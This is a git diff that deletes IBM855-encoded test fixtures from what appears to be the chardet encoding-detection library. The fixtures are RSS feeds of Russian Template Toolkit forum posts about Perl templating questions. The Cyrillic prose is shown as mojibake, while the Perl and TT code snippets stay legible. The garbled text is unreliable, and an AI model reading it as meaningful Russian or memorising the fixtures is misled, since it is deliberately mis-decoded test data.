׀· כ TT2  װ ׀ײ¬ eval() כ Perl? ז. ¨. ¨ד׀· ·ׂ¨ ״ב¨ׂ¨װװח כ ץ ¢׀ײװ¨, ףװ ¨װ·¨ ֶײוײבײ½ דײ¦¨בי·ו ¦·ב¨ֶו·כס, וײ ֶ ֶ כדו כ·ום כ ץ ¢׀ײװ ףװ ¨װ·¨ קוײ½ ״¨ב¨ׂ¨װװײ½, וײ¢ס ¦·ב¨ֶו·כס ¢ס׀· כס״ײ׀װ¨װס,   װ¨ כסכײ¦·׀·דם ֶ ֶ ו¨ֶדו? - - Dionys <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-107.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-107.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - Wed, 31 Aug 2005 11:47:31 GMT -  ב ׂ¨ובס ·ף ץ ¢׀ײװ  כ ץ ¢׀ײװ - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - ב·כ¨ו כד¨ׂ<br /> -פ ב װ¨¨ ¢׀ ¬ײ¦ ב¨װ ף  ¬ב ׂײוװס½ ײוכ¨ו<br /> -בײ¢׀¨ֶׂ  ו ֶ <br /> -ַ ֶ ״¨ב¨¦ ום ·ף ץ ¢׀ײװ  ״ ב ׂ¨ובס כ ץ ¢׀ײװ<br /> -ױ ״ב·ׂ¨ב<br /> -[% INCLUDE tmpl(para1=&gt;value,para2=&gt;value2,...) %] - - plcgi <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-106.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-106.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - Mon, 8 Aug 2005 04:57:04 GMT - INCLUDE - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - ֶ ֶ ״בײ¢בײד·ום ״¨ב¨ׂ¨װװח כײ WRAPPER ¨ב¨ף ₪¨׀ס½ ׀¨ד BLOCK...END כ׀¨װװסµ ¨ב¨ף INCLUDE.<br /> -״סו ׀ד כ ¢·ףװ¨ד-׀ײ¬·ֶ¨ ¦¨׀ ום setter-getter װײ װ¨ ֶ װ ¨ו ״ײ¨ׂחוײ, µײו WRAPPER כבײ¦¨ ײ¢ב ¢ וסכ ¨וד ״ײד׀¨ כד¨µ כ׀ײי¨װװסµ ¢׀ײֶײכ...<br /> -<br /> -PS: PROCESS װ¨ ״ב¨¦׀ ¬ ום.<br /> -<br /> -PPS: ײµײו  כ ¬׀ כװײׂ כב ״״¨ב¨ כסכײ¦·ום ד·דו¨ׂװײ¨ דײײ¢ש¨װ·¨,   חי ¨¬ײ ¬¨װ¨ב·ום כײ כ׀ײי¨װװסµ ץ ¢׀ײװ µ. - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-104.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-104.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - Fri, 22 Jul 2005 12:42:52 GMT - ֶ ֶ ד¦¨׀ ום ֶײװֶ ו¨װ ₪· דובײֶ? · װ¨ ב ¢ײו ¨ו i=i-1 - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - ֶ ֶ ד¦¨׀ ום ֶײװֶ ו װ¨₪· דובײֶ? (ײ״¨ב וײב וײֶ  כ ״¨ב׀)<br />דֶ י¨ׂ, ו ֶ:<br /><br /><div class="code"><pre> -[%SET i=&quot;aaa&quot;.&quot;bbb&quot; %] - -״ײ׀ח ¨ׂ: -unexpected token (.) -</pre></div><br /><br />¸ ¨ש¨. ױ¨ ב ¢ײו ¨ו<br /><div class="code"><pre> -[% i=i-1 %]: - -file error - parse error - articles/index.html line 32: unexpected token (-1) [% i=i-1 %] -</pre></div><br /><br />קוײ ×·  ו ֶ ?<br />כ¨¦ם [% i=i+1 %] ב ¢ײו ¨ו!<br />ֶ ֶ ״ײװ׀ -- · ++ װ¨ דחש¨דוכחו :(<br /><br />כ¨בד· template toolkit 2.14 - - kozyabozya <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-103.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-103.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - Mon, 18 Jul 2005 06:24:54 GMT - Bug ·׀· Feature ? ױ¨ ב ¢ײו ו $_, $! · ו.״. - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - צ ¢׀ײװ:<br /> -[% PERL %]<br /> - $_ = 'test';<br /> - $stash-&gt;set(msg =&gt; $_);<br /> -[% END %]<br /> -&lt;div&gt;[% msg %]&lt;/div&gt;<br /> ---------------------<br /> -tpage --eval_perl<br /> -לס¦ „ו <br /> -Segmentation fault - - ױ·ֶײ׀ ½ ׃ ֶד·ׂײכ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-100.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-100.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - Thu, 14 Jul 2005 07:48:40 GMT - ׳״¨ב ₪· ¦¨׀¨װ· (כ ץ ¢׀ײװ¨) - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - ױ ״ב·ׂ¨ב<br /> -[% a=10 %]<br /> -[% b=5 %]<br /> -<br /> -[% c=a/b %]<br /> -<br /> -לס¦ ¨ו ײץ·¢ֶח. לד¨ ¦בח¬·¨ ײ״¨ב ₪·· װײבׂ ׀םװײ.<br /> -ל ¨ׂ ״ב··װ ? - - ה¨ב¬¨½ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-99.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-99.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - Thu, 14 Jul 2005 03:03:52 GMT - Unit Tests - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - ַוײ · ֶ ֶ ״·ץ¨ו UnitTest-ס ¦׀ דכײ·µ ץ ¢׀ײװײכ.<br /> -ט ׂ¨װ ״ײֶ  UnitTest- ׂ· ״ײֶבסכ ¨וד וײ׀םֶײ ¢·ףװ¨ד ׀ײ¬·ֶ  (ֶײוײב  להא כסװ¨ד¨װ  כ *.pm)<br /> -ױח ֶ ֶ ח כ ד װ ד¨ו ×חװֶ₪·ײװ ׀םװסµ ו¨דוײכ, ײדײ¢¨װװײ WEB-·װו¨בר½ד ? - - ddv <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-98.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-98.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - Mon, 11 Jul 2005 08:56:40 GMT - mod_perl, ײדכײ¢ײי¦ ¨וד ׀· ״ ׂום כװחוב· ץ ¢׀ײװ  TT2 - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - ©דום handler װ  ׂײ¦״¨ב׀¨ <br /> -כ ֶב ו₪¨.<br /> -<br /> -package My::controller;<br /> -our $c; # ¬׀ײ¢ ׀םװ  ״¨ב¨ׂ¨װװ , µקץ כ ֶײוײבײׂ כד¨ וײ װ¨ײ¢µײ¦·ׂײ<br /> -<br /> -sub handler($$){<br /> - my $class = shift;<br /> - my $r = shift;<br /> -<br /> - $c ||= $class-&gt;new(); # ¨ד׀· חי¨ ¢ס׀ דײף¦ װ ״בײ₪¨דד, וײ ¢ײ׀םץ¨ װ¨ װחיװײ ¦¨׀ ום new.<br /> -<br /> - $c-&gt;{t}-&gt;process(&quot;template.tmpl&quot;, $c); # ״בײ₪¨דד·ׂ ו¨ׂ״׀¨½ו ״¨ב¨¦ כ  קוײו י¨ ֶײװובײ׀׀¨ב כ ֶ ¨דוכ¨ ״ ב ׂ¨ובײכ.<br /> -}<br /> -<br /> -##################<br /> -# דײף¦ ¨ׂ ײ¢¨ֶו כ ״ׂו·<br /> -##################<br /> -sub new{<br /> - bless $self, $class<br /> -<br /> - $self-&gt;{dbh} = DBI-&gt;connect(.........); # ¦¨׀ ¨ׂ ֶײװװ¨ֶו<br /> - $self-&gt;{t} = new Template(.........); # ¦¨׀ ¨ׂ ו¨ׂ״׀¨½וס <br /> - $self-&gt;{cgi} = new CGI; <br /> -<br /> - $self-&gt;{site_path} = &quot;/la/bla/bla/la&quot;;<br /> - $self-&gt;{cgi_path} =&quot;/d/sfd/fs/&quot;;<br /> - return $self,<br /> -}<br /> -<br /> -<br /> -כ ץ ¢׀ײװ¨ template.tmpl<br /> -דײף¦ וד ״¨ב¨ׂ¨װװס¨ [% my_var = &quot;12345&quot; %]<br /> -<br /> -ײ·ש ¨וד ׀· ״ׂום ֶײ¬¦  ײו״בײ₪¨דד·וד ץ ¢׀ײװ?<br /> -ו.¨. ¢ח¦¨ו ׀· $c-&gt;{my_var} ״חדוסׂ ״ב· ד׀¨¦חש¨ׂ ף ״בײד¨? - - trdmitry <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-97.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-97.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - Fri, 8 Jul 2005 10:07:01 GMT - ױ¨ ״ײֶ ףסכ וםד ״ב כ·׀םװײ דובײֶ· כ UTF-8 כס¢ב װס¨ ·ף ¢ ףס - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - לס¢·ב  ¦ װװס¨ ·ף ¢ ףס MySQL. § װװס¨ כ UTF-8.<br />©ד׀· ד¦¨׀ ום<br /><div class="code"><pre> -print $string_from_database; -</pre></div><br />וײ UTF-8 ד·ׂכײ׀ס כסכײ¦וד ״ב כ·׀םװײ.<br />¡ ¨ד׀· ¨ב¨ף זז, וײ UTF-8 ד·ׂכײ׀ס כ  ¢ב ֶ ¦ ¢ב¨.<br />¸ קוײ ח ׂ¨װ ׀ײֶ ׀םװײ ״ײ¦ ל·װ¦ײ½,<br />װ  ד¨בכ¨ב¨ ״ײ¦ װ·ֶד כד¨ װײבׂ ׀םװײ. - - rchumak <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-95.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-95.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - Wed, 29 Jun 2005 07:06:16 GMT - ¨ב¨¦   ״ ב ׂ¨ובײכ ·ף ״׀ ¬·װ  - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - ¥·ֶ׀<br /> -@fld[$n] = ({<br /> -id =&gt; $id,<br /> -type =&gt; $type,<br /> -pr =&gt; \@f,<br /> -});<br /> -<br /> -n++<br /> -ַײװ¨₪¥·ֶ׀ <br /> -<br /> -return @fld<br /> -<br /> -<br /> -בײ¢׀¨ׂ  כ וײׂ, וײ ׂ דד·כ @f, חדו װ כ׀·כ ¨וד ײ¦·װ װ  כד¨ ק׀¨ׂ¨װוס @fld<br /> -ַ ֶ קוײ ׂײיװײ ײ¢ײ½ו·? - - ה¨ב¬¨½ <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-93.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-93.html?rss - - - diff --git a/chardet/tests/IBM855/forum.template-toolkit.ru.4.xml b/chardet/tests/IBM855/forum.template-toolkit.ru.4.xml deleted file mode 100644 index 00877e5..0000000 --- a/chardet/tests/IBM855/forum.template-toolkit.ru.4.xml +++ /dev/null @@ -1,130 +0,0 @@ - - - - - «ײבחׂס Template Toolkit : ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_forum/forum_id-4.html?rss - Template Toolkit - ¢סדוב , ׂײשװ  · ב דץ·ב¨ׂ  ד·דו¨ׂ  ײ¢ב ¢ײוֶ· ץ ¢׀ײװײכ. ױ  ד ½ו¨ ב ¢ײו ¨ו ×ײבחׂ, כ ֶײוײבײׂ ײ¢דחי¦ וד כײ״בײדס ·ד״ײ׀םףײכ װ· ¢·¢׀·ײו¨ֶ· ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ·. ב¨¦׀ײי¨װ· ״ײ ב ¢ײו¨ ×ײבחׂ . ׳ב¬ װ·ף ₪· װײכסµ ֶ ו¨¬ײב·½ · ×ײבחׂײכ. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Tue, 3 Jan 2006 08:27:57 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ץ ¢׀ײװס כ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - Tue, 3 Jan 2006 08:27:57 GMT - ה ױײכסׂ ­ײ¦ײׂ - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - ײף¦ב כ׀ כד¨µ ״ײד¨ו·ו¨׀¨½ קוײ¬ײ װ¨¢ײ׀םץײ¬ײ, װײ װ ¦¨דם ״ײ׀¨ףװײ¬ײ, ד ½ו  ד װ דוח״·כץ·ׂ 2006 ¬ײ¦ײׂ! ך¨׀  װײכסµ וכײב¨דֶ·µ ח¦  · װ µײ¦ײֶ. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-123.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-123.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - Thu, 20 Jan 2005 12:10:22 GMT - XUL ײ¢׀ײיֶ  - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - §׀ ״ײ׀םףײכ ו¨׀¨½ ¢בײחף¨בײכ Mozilla ד¦¨׀ ׀ <a target="_blank" href="http://template-toolkit.ru/xul/index.xul">XUL ײ¢׀ײיֶח</a>. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-57.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-57.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - Wed, 15 Dec 2004 08:44:32 GMT - ױ¨ ״ב·µײ¦·ו ֶײ¦ ¦׀ ף כ¨בץ¨װ· ב¨¬·דוב ₪·· - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - פ¦ב כדוכח½ו¨!<br /> -<br /> -׃װ¨ װ¨ ״ב·µײ¦·ו ֶײ¦ ¦׀ ף כ¨בץ¨װ· ב¨¬·דוב ₪·· :(. ג¨¬·דוב·בײכ ׀ד 2 ב ף  ד ב ףװסׂ· ״ײו.  ¦ב¨ד ׂ·, װײ ק×רֶו װח׀¨כײ½ :(. - - ױ·ֶײ׀ ½ ל. <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-44.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-44.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - Sat, 4 Dec 2004 22:08:26 GMT - RDF ד׀חי¢  ף ¬ײ׀ײכֶײכ - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - ױ  ×ײבחׂ¨ ¦ײ¢ כ׀¨װ  <span style="font-weight:bold">RDF ד׀חי¢  ף ¬ײ׀ײכֶײכ</span>. רו  ד׀חי¢  ¬ײוײכ·ו × ½׀ס ד ף ¬ײ׀ײכֶ ׂ· װײכסµ ו¨ׂ, ײוֶבסוסµ כ ×ײבחׂ µ, כ ×ײבׂ ו¨ XML/RDF. ה ״ײׂײשם RDF ד׀חי¢ס ׂײיװײ ײב¬ װ·ףײכ ום ״ײ¦״·דֶח װ  װײכס¨ ו¨ׂס, ײוֶבסוס¨ כ ×ײבחׂ µ.<br /><br />ל װ דוײש·½ ׂײׂ¨װו ¦ײדוח״װס ד׀¨¦חש·¨ ״ײ¦״·דֶ· <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_1.rdf">פװ ֶײׂדוכײ ד Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_6.rdf">ױײכײדו· Template Toolkit</a>, <a target="_blank" href="http://forum.template-toolkit.ru/rss/forum_4.rdf">׳¢דחי¦¨װ·¨ ×ײבחׂ </a>.<br /><br />§׀ ײוד׀¨י·כ װ· װײכסµ ו¨ׂ · ו¨װ· ף ¬ײ׀ײכֶײכ ׂײיװײ ·ד״ײ׀םףײכ ום ד״¨₪· ׀םװס¨ ״בײ¬ב ׂׂס · ד׀חי¢ס, װ ״ב·ׂ¨ב: <a target="_blank" href="http://www.activerefresh.com/">Abilon</a>, <a target="_blank" href="http://www.feedreader.com/">FeedReader</a>, <a target="_blank" href="http://www.yole.ru/projects/syndirella/">Syndirella</a>, <a target="_blank" href="http://blogspace.com/rss/readers">RSS Readers</a>, <a target="_blank" href="http://www.watznew.com/">WatzNew</a>.<br /><br />ײ׀םףײכ ו¨׀· ¢בײחף¨ב  <span style="font-weight:bold"><span style="color: orange">Firefox</span></span> (כ¨בד·· 0.8 · דו בץ¨) ו ֶי¨ ׂײ¬חו װ דובײ·ום ״ײ¦״·דֶח ¨ב¨ף <span style="font-weight:bold">Live Bookmark</span>. §׀ קוײ¬ײ װחיװײ ף ½ו· כ כס¢ב װװס½ ×ײבחׂ (װ ״ב·ׂ¨ב, <a target="_blank" href="http://forum.template-toolkit.ru/view_forum/forum_id-6.html">ױײכײדו· Template Toolkit</a>). ל װ·יװ¨ׂ ״ב כײׂ ח¬׀ח ¢בײחף¨ב  ״ײכ·וד ףװ ײֶ <img src="http://forum.template-toolkit.ru/attachments/000/138/138/rdf.gif" alt="RDF" />. §ײדו וײװײ ש¨׀ֶװחום ״ײ ףװ ֶח · ¦ײ¢ כ·ום ״ײ¦״·דֶח כ ף ֶ׀ ¦ֶ·. ײד׀¨ קוײ¬ײ כ ף ֶ׀ ¦ֶ µ ״ײכ·וד ״ ״ֶ  &quot;ױײכײדו· Template Toolkit&quot;, כ ֶײוײבײ½ ״¨ב·ײ¦·¨דֶ· ¢ח¦חו ײ¢װײכ׀וםד ף ¬ײ׀ײכֶ· װײכסµ ו¨ׂ כ ×ײבחׂ¨ &quot;ױײכײדו· Template Toolkit&quot;. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-40.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-40.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - Wed, 21 Jul 2004 14:52:30 GMT - ״ײ¦״·דם [­ײדום] - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - וײ-וײ װ¨ דײכד¨ׂ ״ײװוװײ¨ וכײב·וד.<br /> -׃¨װ ב ד״ײףװ ¨ו ד·דו¨ׂ  ֶ ֶ Light Elf, װײ ׂײ· דײײ¢ש¨װ· ״ײׂ¨ וד װ ¦״·דם [­ײדום].<br /> -<br /> -רוײ ו ֶ װ ¦ײ? - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-8.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-8.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - Tue, 20 Jul 2004 15:02:45 GMT - בײ¢¨׀ס כ דײײ¢ש¨װ·µ - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - ©דום ״ב¨¦׀ײי¨װ·¨ װ¨ ח¦ ׀ום ״בײ¢¨׀ס.<br /> -ד ·µ ״ײׂײשם ח¦ײ¢װײ ×ײבׂ ו·בײכ ום ו¨ֶדו.<br /> -׳דײ¢¨װװײ ֶײ¦. - - Light Elf <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-7.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-7.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - Wed, 14 Jul 2004 06:13:38 GMT - §כ·יײֶ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - א װ¨ דײכד¨ׂ ״ײװ׀. <br /> -רׂ¢׀¨ֶׂ  דכ¨בµח &quot;powered by [%TT2%]&quot; ײףװ  ¨ו וײ קוײו ×ײבחׂ ד¦¨׀ װ װ  TT2? - - UncleAndy <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-4.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-4.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - Mon, 12 Jul 2004 04:25:44 GMT - «ײבחׂס ײוֶבסוס - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - 12 ·׀ 2004 ¬ײ¦  ײוֶבס׀·דם <span style="font-weight:bold">×ײבחׂס Template Toolkit</span>. ב·¬׀ ץ  כד¨µ ·װו¨ב¨דחש·µד · ·ד״ײ׀םףחש·µ כ ב ¢ײו¨ ¢·¢׀·ײו¨ֶח Template Toolkit ֶ ח דו·.<br /><br />׃ײ· ¢׀ ¬ײ¦ בװײדו·:<br /><br />§ׂ·וב· ױ·ֶײ׀ ¨כח ף  ״ײ¦¦¨ביֶח, ב דדס׀ֶח ¨ב¨ף ״ײ¦״·דֶח Subscribe.Ru דו ום· ײ Template Toolkit, ״ב¨¦ײדו כ׀¨װ·¨ ×ײבחׂ  <a target="_blank" href="http://perl.dp.ua/cgi-bin/forum.pl?do=show&tema=1&page=1">Perl - פ µײ¦· · ח·דם</a> כ ֶ ¨דוכ¨ ×ײבחׂ  ״ײ¦¦¨ביֶ· ד ½ו  <a target="_blank" href="http://www.template-toolkit.ru/">Template Toolkit (בחדדֶ  ב¨¦ ֶ₪·)</a>.<br /><br />ל ¦·ׂח החµ װײכח ף  ״ײ¦¦¨ביֶח · ·¦¨ דײף¦ װ· קו·µ ×ײבחׂײכ.<br /><br />ױ ¦¨דם, וײ ×ײבחׂס דו װחו ״ײ׀¨ףװסׂ· ¦׀ ו¨µ, ֶוײ ·ד״ײ׀םףח¨ו ·׀· דײ¢·ב ¨וד ·ד״ײ׀םףײכ ום כ דכײ·µ ב ףב ¢ײוֶ µ ¢·¢׀·ײו¨ֶח ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ· Template Toolkit. ה״ב ץ·כ ½ו¨, ¦¨׀·ו¨דם, ײ¢דחי¦ ½ו¨.<br /><br /><span style="font-weight:bold">הובחֶוחב  ×ײבחׂ  ״ב¨¦כ ב·ו¨׀םװ </span>. א ¬ײוײכ כסד׀חץ ום · ח¨דום כד¨ ״ב¨¦׀ײי¨װ· ״ײ דײף¦ װ· װײכסµ כ¨וײֶ כ ב ֶׂ µ ×ײבחׂײכ Template Toolkit.<br /><br />ה ׂ ×ײבחׂ װ ״·ד װ ד ·ד״ײ׀םףײכ װ·¨ׂ Template Toolkit · ¢ח¦¨ו ¦ײב ¢ וסכ וםד. לד¨ ף ׂ¨ װ· · ״ב¨¦׀ײי¨װ· ״ב·כ¨ודוכחוד. - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-1.html - ׳¢דחי¦¨װ·¨ ×ײבחׂ  - http://forum.template-toolkit.ru/view_topic/topic_id-1.html?rss - - - diff --git a/chardet/tests/IBM855/forum.template-toolkit.ru.6.xml b/chardet/tests/IBM855/forum.template-toolkit.ru.6.xml deleted file mode 100644 index da4b288..0000000 --- a/chardet/tests/IBM855/forum.template-toolkit.ru.6.xml +++ /dev/null @@ -1,486 +0,0 @@ - - - - - «ײבחׂס Template Toolkit : ױײכײדו· Template Toolkit - http://forum.template-toolkit.ru/view_forum/forum_id-6.html?rss - Template Toolkit - ¢סדוב , ׂײשװ  · ב דץ·ב¨ׂ  ד·דו¨ׂ  ײ¢ב ¢ײוֶ· ץ ¢׀ײװײכ. ױ  ד ½ו¨ ב ¢ײו ¨ו ×ײבחׂ, כ ֶײוײבײׂ ײ¢דחי¦ וד כײ״בײדס ·ד״ײ׀םףײכ װ· ¢·¢׀·ײו¨ֶ· ״ײ ב ¢ײו¨ ד ץ ¢׀ײװ ׂ·. ¡װײװדס · װײכײדו·, דכף װװס¨ ד Template Toolkit. - ru - Lobanov Igor - Lobanov Igor <webmaster@template-toolkit.ru> - Mon, 26 Dec 2005 16:28:41 GMT - Wed, 4 Jan 2006 02:29:01 GMT - Perl script, Template Toolkit - - http://forum.template-toolkit.ru/images/tt2powered.gif - Template Toolkit - ץ ¢׀ײװס כ perl - http://forum.template-toolkit.ru/ - 88 - 31 - - http://blogs.law.harvard.edu/tech/rss - - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - Mon, 19 Dec 2005 14:49:49 GMT - Template::Provider::FromDATA - ף ¬בחףֶ  ץ ¢׀ײװײכ ·ף ד¨ֶ₪·· __DATA__ - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 0.04 <a target="_blank" href="http://search.cpan.org/~bricas/Template-Provider-FromDATA/">ׂײ¦ח׀ Template::Provider::FromDATA</a>, ֶײוײבס½ ״ײףכײ׀¨ו µב װ·ום ץ ¢׀ײװס כׂ¨דו¨ ד ֶײ¦ײׂ כ ײ¦װײׂ × ½׀¨ (ד¨ֶ₪· __DATA__).<br /><br />§׀ ·ד״ײ׀םףײכ װ· ¦ װװײ¬ײ ׂײ¦ח׀ װ¨ײ¢µײ¦·ׂײ כװ  ׀¨ דײף¦ ום קֶף¨ׂ״׀ב ״בײכ ½¦¨ב  Template::Provider::FromDATA,   ף ו¨ׂ חֶ ף ום ¨¬ײ כ ֶ ¨דוכ¨ ״ײדו כש·ֶ  ץ ¢׀ײװײכ כ ֶײװדובחֶוײב¨ Template:<br /><br /><div class="code"><pre>use Template; -use Template::Provider::FromDATA; - -# הײף¦ „ׂ ײ¢¨ֶו ״ײדו כש·ֶ  -my $provider = Template::Provider::FromDATA-&gt;new( { - CLASSES =&gt; __PACKAGE__ -} ); - -# טֶ ףסכ ¨ׂ ײ¢¨ֶו ״ײדו כש·ֶ  כ ײ״₪· ֶײװדובחֶוײב  Template -my $template = Template-&gt;new( { - # ... - LOAD_TEMPLATES =&gt; [ $provider ] -} ); - -# ...ד ׂ· ץ ¢׀ײװס כ ד¨ֶ₪·· __DATA__ - -__DATA__ - -__mytemplate__ -Foo [% bar %] - -__myothertemplate__ -Baz, [% qux %]?</pre></div> - - ׁײ¢ װײכ ¸¬ײבם <authors@template-toolkit.ru> - http://forum.template-toolkit.ru/view_topic/topic_id-122.html - Template Toolkit - ¢·¢׀·ײו¨ֶ  ¦׀ ב ¢ײוס ד ץ ¢׀ײװ ׂ· כ Perl - http://forum.template-toolkit.ru/view_topic/topic_id-122.html?rss - - - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - Mon, 19 Dec 2005 14:10:59 GMT - Template::Plugin::HTML::Strip - ח¦ ׀¨װ·¨ HTML-ו¨¬ײכ ·ף ו¨ֶדו  - http://forum.template-toolkit.ru/view_topic/topic_id-121.html?rss - ױ  CPAN ײ״ח¢׀·ֶײכ װ  כ¨בד· 0.01 ׂײ¦ח׀ <a target="_blank" href="http://search.cpan.org/~gsimmons/Template-Plugin-HTML-Strip/">ׂײ¦ח׀ Template::Plugin::HTML::Strip</a>. ׃ײ¦ח׀ם ״ב¨¦ײדו כ׀¨ו ״׀ ¬·װ, ֶײוײבס½ ״ײףכײ׀¨ו ח¦ ׀ום ·ף ו¨ֶדו  HTML-ו¨¬·.<br /><br /><div class="code"><pre>[% USE HTML.Strip %] - -[% FILTER html_strip %] -&lt;title&gt;People for the Preservation of Presentational Markup&lt;/title&gt; -&lt;h1&gt;HTML::Strip - A cause for concern?&lt;/h1&gt; -[% END %] - -[% USE HTML.Strip 'strip' - striptags = [ 'script' 'iframe' ] - emit_spaces = 0 -%] - -[% FILTER strip %] -&lt;p&gt;A call to arms against the removal of our elements!&lt;/p&gt; -[% END %]</pre></div> - - ׁײ¢ װײכ 